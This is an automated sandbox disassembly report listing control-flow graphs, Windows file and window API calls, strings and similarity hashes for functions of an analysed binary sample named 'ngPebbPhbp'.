                                                control_flow_graph 1143 b22813-b22845 call b07673 1146 b22847 1143->1146 1147 b2284a-b22850 1143->1147 1146->1147 1148 b22856-b2285b 1147->1148 1149 b22abd 1147->1149 1150 b22860-b2286e 1148->1150 1151 b2285d 1148->1151 1152 b22abf-b22ac3 1149->1152 1155 b22870-b2287c 1150->1155 1156 b22896 1150->1156 1151->1150 1153 b22ac5-b22ac8 1152->1153 1154 b22ace-b22ad2 1152->1154 1157 b22af7 1153->1157 1158 b22aca-b22acc 1153->1158 1154->1157 1159 b22ad4-b22ad7 1154->1159 1155->1156 1160 b2287e 1155->1160 1161 b22899-b2289c 1156->1161 1170 b234ad-b234e9 call b058cb 1157->1170 1164 b22ada-b22af2 call b07673 call b238a0 1158->1164 1159->1157 1165 b22ad9 1159->1165 1166 b22884-b22888 1160->1166 1162 b228a2-b228a7 1161->1162 1163 b22ab7 1161->1163 1167 b228a9 1162->1167 1168 b228ac-b228d7 call b2acee call b01afc 1162->1168 1163->1149 1164->1157 1165->1164 1171 b229f0-b229f2 1166->1171 1172 b2288e-b22894 1166->1172 1167->1168 1168->1170 1182 b228dd-b228e1 1168->1182 1171->1156 1175 b229f8-b229fc 1171->1175 1172->1156 1172->1166 1175->1161 1183 b228e3 1182->1183 1184 b228e5-b228ec 1182->1184 1183->1184 1185 b228f1-b2292f call b0120c call b1645a 1184->1185 1186 b228ee 1184->1186 1191 b22935-b22937 1185->1191 1186->1185 1192 b22a01-b22a07 1191->1192 1193 b2293d-b2299f call b014a7 call b0adaa call b01a66 call b014a7 call b0adaa call b01a66 1191->1193 1195 b22a09-b22a24 1192->1195 1196 b22a4e-b22a68 1192->1196 1222 b229a1-b229a3 1193->1222 1223 b229a4-b229d2 call b014a7 call b0adaa call b01a66 1193->1223 1200 b22a26-b22a3f call b019a9 1195->1200 1201 b22a45-b22a4d call b25726 1195->1201 1198 b22a6a-b22a85 1196->1198 1199 b22aaf-b22ab5 1196->1199 1204 b22aa6-b22aae call b25726 1198->1204 1205 b22a87-b22aa0 call b019a9 1198->1205 1199->1152 1200->1201 1201->1196 1204->1199 1205->1204 1222->1223 1230 b229d7-b229eb call b1645a 1223->1230 1231 b229d4-b229d6 1223->1231 1230->1191 1231->1230
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: HIDE$MAX$MIN
                                                • API String ID: 176396367-2426493550
                                                • Opcode ID: 02cd1a1e28bffd06a57fc244c93c94844c36461a8d3954148ed7c19863613383
                                                • Instruction ID: de1953efcf1db7fa8374997e5551dec1e12edd108520cbaa05beec3e750fdf0a
                                                • Opcode Fuzzy Hash: 02cd1a1e28bffd06a57fc244c93c94844c36461a8d3954148ed7c19863613383
                                                • Instruction Fuzzy Hash: 1FA17C72C00268DECF25DBA4DC85ADDBBF9BF49314F1405DAE809F7281DA359A89CB50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1234 b1f2ce-b1f2f7 GetClassNameW 1235 b1f2f9-b1f30e call b18da4 1234->1235 1236 b1f31f-b1f321 1234->1236 1242 b1f310-b1f31c FindWindowExW 1235->1242 1243 b1f31e 1235->1243 1237 b1f323-b1f326 SHAutoComplete 1236->1237 1238 b1f32c-b1f338 call b25734 1236->1238 1237->1238 1242->1243 1243->1236
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000050), ref: 00B1F2EF
                                                • SHAutoComplete.SHLWAPI(?,00000010), ref: 00B1F326
                                                  • Part of subcall function 00B18DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00B10E3F,?,?,?,00000046,00B11ECE,00000046,?,exe,00000046), ref: 00B18DBA
                                                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B1F316
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                • String ID: EDIT
                                                • API String ID: 4243998846-3080729518
                                                • Opcode ID: cea28203f2dfbce7b0f35ba3935967a3d4709a6ee081a038add3980aaa474608
                                                • Instruction ID: 6be045183fcfed13e7da8502fe05ac3fa94a76de5f031fa4c6aed8c21918d9ec
                                                • Opcode Fuzzy Hash: cea28203f2dfbce7b0f35ba3935967a3d4709a6ee081a038add3980aaa474608
                                                • Instruction Fuzzy Hash: 90F0A431701219ABDB209B24AD05FEF77ECDF45B10F4400A5BA00E71D0DE70AE45C6A9

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1245 b0e948-b0e961 call b257d8 1248 b0e963-b0e965 1245->1248 1249 b0e96a-b0e974 1245->1249 1250 b0eaa6-b0eaab call b25787 1248->1250 1251 b0e976-b0e983 GetStdHandle 1249->1251 1252 b0e988 1249->1252 1254 b0ea6f-b0ea72 1251->1254 1255 b0e98b-b0e998 1252->1255 1254->1255 1256 b0e99a-b0e99e 1255->1256 1257 b0e9df-b0e9f4 WriteFile 1255->1257 1259 b0e9a0-b0e9ab 1256->1259 1260 b0e9ff-b0ea03 1256->1260 1261 b0e9f7-b0e9f9 1257->1261 1262 b0e9ad 1259->1262 1263 b0e9af-b0e9ce WriteFile 1259->1263 1264 b0ea9f-b0eaa2 1260->1264 1265 b0ea09-b0ea0d 1260->1265 1261->1260 1261->1264 1262->1263 1263->1261 1266 b0e9d0-b0e9db 1263->1266 1264->1250 1265->1264 1267 b0ea13-b0ea25 call b09230 1265->1267 1266->1259 1268 b0e9dd 1266->1268 1271 b0ea77-b0ea9a call b014a7 call b09653 call b01a66 1267->1271 1272 b0ea27-b0ea30 1267->1272 1268->1261 1271->1264 1272->1255 1274 b0ea36-b0ea3a 1272->1274 1274->1255 1276 b0ea40-b0ea6c 1274->1276 1276->1254
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0E94F
                                                • GetStdHandle.KERNEL32(000000F5,0000002C,00B12D28,?,?,?,?,00000000,00B1ABB6,?,?,?,?,?,00B1A80E,?), ref: 00B0E978
                                                • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B0E9BE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FileH_prolog3_HandleWrite
                                                • String ID:
                                                • API String ID: 2898186245-0
                                                • Opcode ID: 7da32f337c1caac49664baed558513faa52ebbd79e8236a80c0b0de72cae75d3
                                                • Instruction ID: e21af64d3050cb83e447adb06cad3af4e1dbfe84eed86771c3b51d65e4c58204
                                                • Opcode Fuzzy Hash: 7da32f337c1caac49664baed558513faa52ebbd79e8236a80c0b0de72cae75d3
                                                • Instruction Fuzzy Hash: D9417B35A01254AFDB14DFA4D884BAD7FB6FF88700F144998E811AB2D1CB71DD44CBA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1284 b0efef-b0f00a call b257d8 call b113da 1289 b0f031-b0f033 1284->1289 1290 b0f00c-b0f00f 1284->1290 1291 b0f035-b0f03d call b0ed0d 1289->1291 1290->1289 1292 b0f011-b0f017 1290->1292 1301 b0f0e3-b0f0f0 GetLastError 1291->1301 1302 b0f043-b0f065 call b1169a 1291->1302 1293 b0f019 1292->1293 1294 b0f01b-b0f029 CreateDirectoryW 1292->1294 1293->1294 1296 b0f0d0-b0f0d4 1294->1296 1297 b0f02f 1294->1297 1299 b0f0d6-b0f0da call b0f58b 1296->1299 1300 b0f0df-b0f0e1 1296->1300 1297->1291 1299->1300 1305 b0f0fb-b0f100 call b25787 1300->1305 1301->1305 1306 b0f0f2-b0f0fa 1301->1306 1309 b0f067-b0f06e 1302->1309 1310 b0f07d-b0f087 1302->1310 1306->1305 1312 b0f070 1309->1312 1313 b0f073-b0f07b CreateDirectoryW 1309->1313 1314 b0f089-b0f09e 1310->1314 1315 b0f0bc-b0f0ce 1310->1315 1312->1313 1313->1310 1316 b0f0a0-b0f0b0 call b019a9 1314->1316 1317 b0f0b3-b0f0bb call b25726 1314->1317 1315->1296 1315->1301 1316->1317 1317->1315
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0EFF6
                                                • CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,00B0EBA7,?,00000001,00000000,?,?,00000024,00B0A4DE,?,00000001,?,?), ref: 00B0F01F
                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,00B0EBA7,?,00000001,00000000,?,?,00000024,00B0A4DE,?), ref: 00B0F075
                                                • GetLastError.KERNEL32(?,?,00000024,00B0EBA7,?,00000001,00000000,?,?,00000024,00B0A4DE,?,00000001,?,?,00000000), ref: 00B0F0E3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CreateDirectory$ErrorH_prolog3_Last
                                                • String ID:
                                                • API String ID: 3709856315-0
                                                • Opcode ID: 2aa969ae394f5d1854458f148732621890120db8c4f40f0d94e1332aaddb4e5b
                                                • Instruction ID: 6151cb23ed76a093170a45a4c9a9b10c7cabb7e6ed3a1cfbb2ef6c649c0dce86
                                                • Opcode Fuzzy Hash: 2aa969ae394f5d1854458f148732621890120db8c4f40f0d94e1332aaddb4e5b
                                                • Instruction Fuzzy Hash: 85318371A0021A9BDF24DFE9D8889FEBFF9EF48300F1444AAE501E3691D7349985CB65
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,00B0E5D2,?,?,00000000,?,00000000), ref: 00B0E029
                                                • ReadFile.KERNELBASE(?,?,00000000,00100000,00000000,?,?,?,00000000,00B0E5D2,?,?,00000000,?,00000000), ref: 00B0E041
                                                • GetLastError.KERNEL32(?,?,?,00000000,00B0E5D2,?,?,00000000,?,00000000), ref: 00B0E073
                                                • GetLastError.KERNEL32(?,?,?,00000000,00B0E5D2,?,?,00000000,?,00000000), ref: 00B0E092
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ErrorLast$FileHandleRead
                                                • String ID:
                                                • API String ID: 2244327787-0
                                                • Opcode ID: 24b2700bf32693e15d4c2119ba8381203592c24002ced93cf3cf0896249bd7c6
                                                • Instruction ID: 25f50008c0a2e6a2cb57318bdb212e0e0e8af16f137b29fe67f1bac719f0c299
                                                • Opcode Fuzzy Hash: 24b2700bf32693e15d4c2119ba8381203592c24002ced93cf3cf0896249bd7c6
                                                • Instruction Fuzzy Hash: D1117031500208EFDB245B60C946A6E3FE9FB41361F208EA9E476951D0EBB1DD44DB61
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00010000,Function_00017760,?,00000000,?), ref: 00B1764C
                                                • SetThreadPriority.KERNEL32(?,00000000,?,?,?,?,00000004,00B0736D,00B05AB0,?), ref: 00B17693
                                                  • Part of subcall function 00B092EB: __EH_prolog3_GS.LIBCMT ref: 00B092F2
                                                  • Part of subcall function 00B09500: __EH_prolog3_GS.LIBCMT ref: 00B09507
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3_Thread$CreatePriority
                                                • String ID: CreateThread failed
                                                • API String ID: 3138599208-3849766595
                                                • Opcode ID: 3231b457906504b0837b331879696c110d8f9f9ff84636bdc1ff0d45fde9dcfc
                                                • Instruction ID: 241adde408f39b147793552dbcab9bcc207d9c9260f1d8af539d4cd60f71a91f
                                                • Opcode Fuzzy Hash: 3231b457906504b0837b331879696c110d8f9f9ff84636bdc1ff0d45fde9dcfc
                                                • Instruction Fuzzy Hash: C401A2722887066BE2246F68AC82BA677E8EB40711F2000AAF55697181CEE1A8448728
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0DEA1
                                                • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,00000024,00B0E8F5,?,?,00B0A6B9,?,00000011,?), ref: 00B0DF15
                                                • CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,00B0D303,?,?,?), ref: 00B0DF65
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CreateFile$H_prolog3_
                                                • String ID:
                                                • API String ID: 1771569470-0
                                                • Opcode ID: 82f93aa11e2cd8546c8f5197ae2f339d4cc5bbc57f4d50f03217d4e66196650e
                                                • Instruction ID: 85d0fb9387d6c08421e6285b802709fb1939353cfe06eecf3f2041994017b8be
                                                • Opcode Fuzzy Hash: 82f93aa11e2cd8546c8f5197ae2f339d4cc5bbc57f4d50f03217d4e66196650e
                                                • Instruction Fuzzy Hash: 814171718102099FDF24DFE8D889BEEBBF4EB08320F50965EE456E72D1D774A9448B24
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B16C65
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00B16C9A
                                                • LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 00B16D0C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: DirectoryH_prolog3_LibraryLoadSystem
                                                • String ID:
                                                • API String ID: 1552931673-0
                                                • Opcode ID: a775cee35e10e192f013f8c1fb1b7b1907a3d74b59668af910e53e30cf7da4b3
                                                • Instruction ID: b6dab343de0886483b7f3ff9624a173c5c4120903cc17b65fed4949bb4cd0897
                                                • Opcode Fuzzy Hash: a775cee35e10e192f013f8c1fb1b7b1907a3d74b59668af910e53e30cf7da4b3
                                                • Instruction Fuzzy Hash: FA318C71D00248DFCB08DBE8D889BEEBBF9EF48314F20059AE105B7291DB345A85CB61
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0F592
                                                • SetFileAttributesW.KERNELBASE(?,?,00000024,00B0A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00B0F5A8
                                                • SetFileAttributesW.KERNEL32(?,?,?,?,?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049), ref: 00B0F5EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AttributesFile$H_prolog3_
                                                • String ID:
                                                • API String ID: 2559025557-0
                                                • Opcode ID: 1275d551f8e8fbb065323e244c76c8b03162b0e8714ac1c1f4bedc2fba420f99
                                                • Instruction ID: 5c8c410a60559f63582d38f8ef95b677ccfc7c406efc4e0685386427dbdc9a11
                                                • Opcode Fuzzy Hash: 1275d551f8e8fbb065323e244c76c8b03162b0e8714ac1c1f4bedc2fba420f99
                                                • Instruction Fuzzy Hash: 5B112971A10219EBCF14DFA4E8459EEBBF8FF08310F14446AF404E72A0DB359954CB64
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0EC6A
                                                • DeleteFileW.KERNELBASE(?,00000024,00B0D6F7,?), ref: 00B0EC7D
                                                • DeleteFileW.KERNEL32(00000000,?,00000000), ref: 00B0ECBD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: DeleteFile$H_prolog3_
                                                • String ID:
                                                • API String ID: 3558260747-0
                                                • Opcode ID: 74704c3940cd41fbe514d06abf8dfc8cee094ddde8fe56ab01c296da19c53741
                                                • Instruction ID: e68f61bde3caa7c9c63c9bbaec96f9020167ca158eadabb6c2ab9587b0f3dcd9
                                                • Opcode Fuzzy Hash: 74704c3940cd41fbe514d06abf8dfc8cee094ddde8fe56ab01c296da19c53741
                                                • Instruction Fuzzy Hash: 2B110771D10219DBDF14DFA8E889ADEBBF8EF08310F14446AE414F7290DB35E9848B64
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0ED26
                                                • GetFileAttributesW.KERNELBASE(?,00000024,00B0ED16,00000000,00B0A4A1,5EA84158,?,00B0CDDD,?,?,?,?,?,?,?,?), ref: 00B0ED39
                                                • GetFileAttributesW.KERNELBASE(?,?,?), ref: 00B0ED79
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AttributesFile$H_prolog3_
                                                • String ID:
                                                • API String ID: 2559025557-0
                                                • Opcode ID: 0f82712289ab91381a65698ae5382ace5a202ed65e43e7af38fc739cf7ff02a5
                                                • Instruction ID: 9b32b997e1740245c5c6f6e0c076efdf55e217232f9ed90a2b1d9c2d58e37391
                                                • Opcode Fuzzy Hash: 0f82712289ab91381a65698ae5382ace5a202ed65e43e7af38fc739cf7ff02a5
                                                • Instruction Fuzzy Hash: DF110775910218DBCF18DFA8E9899EDBBF9FB48320F14096AE514F3290DB3099458B64
                                                APIs
                                                • SetFilePointer.KERNELBASE(000000FF,?,?,?,?,00000000,?,00000000,00B0E3B1,?,?,00000000,?,?,00B0CC21,?), ref: 00B0E55F
                                                • GetLastError.KERNEL32 ref: 00B0E56E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastPointer
                                                • String ID:
                                                • API String ID: 2976181284-0
                                                • Opcode ID: 557fd4fc002006f1f90e5972756bd627fe7ff78fdfb4468c1da17d4b0f372c27
                                                • Instruction ID: 010b95f75abcf193db0d46524d4aa3bff51a73c3343c7ca64f143a69e8fead3a
                                                • Opcode Fuzzy Hash: 557fd4fc002006f1f90e5972756bd627fe7ff78fdfb4468c1da17d4b0f372c27
                                                • Instruction Fuzzy Hash: D241F4316043558BC7249F64D8846AEBBE5FB58320F144D9DD8A5833C1E7B4EC448BA2
                                                APIs
                                                  • Part of subcall function 00B30005: GetLastError.KERNEL32(?,?,00B2B581,?,00B4E088,?,00B2AE80,?,00B4E088,?,00000007), ref: 00B30009
                                                  • Part of subcall function 00B30005: _free.LIBCMT ref: 00B3003C
                                                  • Part of subcall function 00B30005: SetLastError.KERNEL32(00000000,00B4E088,?,00000007), ref: 00B3007D
                                                  • Part of subcall function 00B30005: _abort.LIBCMT ref: 00B30083
                                                  • Part of subcall function 00B327FE: _abort.LIBCMT ref: 00B32830
                                                  • Part of subcall function 00B327FE: _free.LIBCMT ref: 00B32864
                                                  • Part of subcall function 00B3246B: GetOEMCP.KERNEL32(00000000,?,?,00B326F4,?), ref: 00B32496
                                                • _free.LIBCMT ref: 00B3274F
                                                • _free.LIBCMT ref: 00B32785
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _free$ErrorLast_abort
                                                • String ID:
                                                • API String ID: 2991157371-0
                                                • Opcode ID: 81c7f57ce7da87e230564cd6fe75e148414d229c44d64deb43ebbc2986c583ef
                                                • Instruction ID: 9c7dcde3ad2bedccbafda007451599e36ba2a40f25ea7b8806ea78787573fe38
                                                • Opcode Fuzzy Hash: 81c7f57ce7da87e230564cd6fe75e148414d229c44d64deb43ebbc2986c583ef
                                                • Instruction Fuzzy Hash: F731B431914208EFDB10EFA9D881BA9B7F5FF41320F3541E9E514AB2A1EB729E41CB50
                                                APIs
                                                • FlushFileBuffers.KERNEL32(?), ref: 00B0E78C
                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00B0E840
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: File$BuffersFlushTime
                                                • String ID:
                                                • API String ID: 1392018926-0
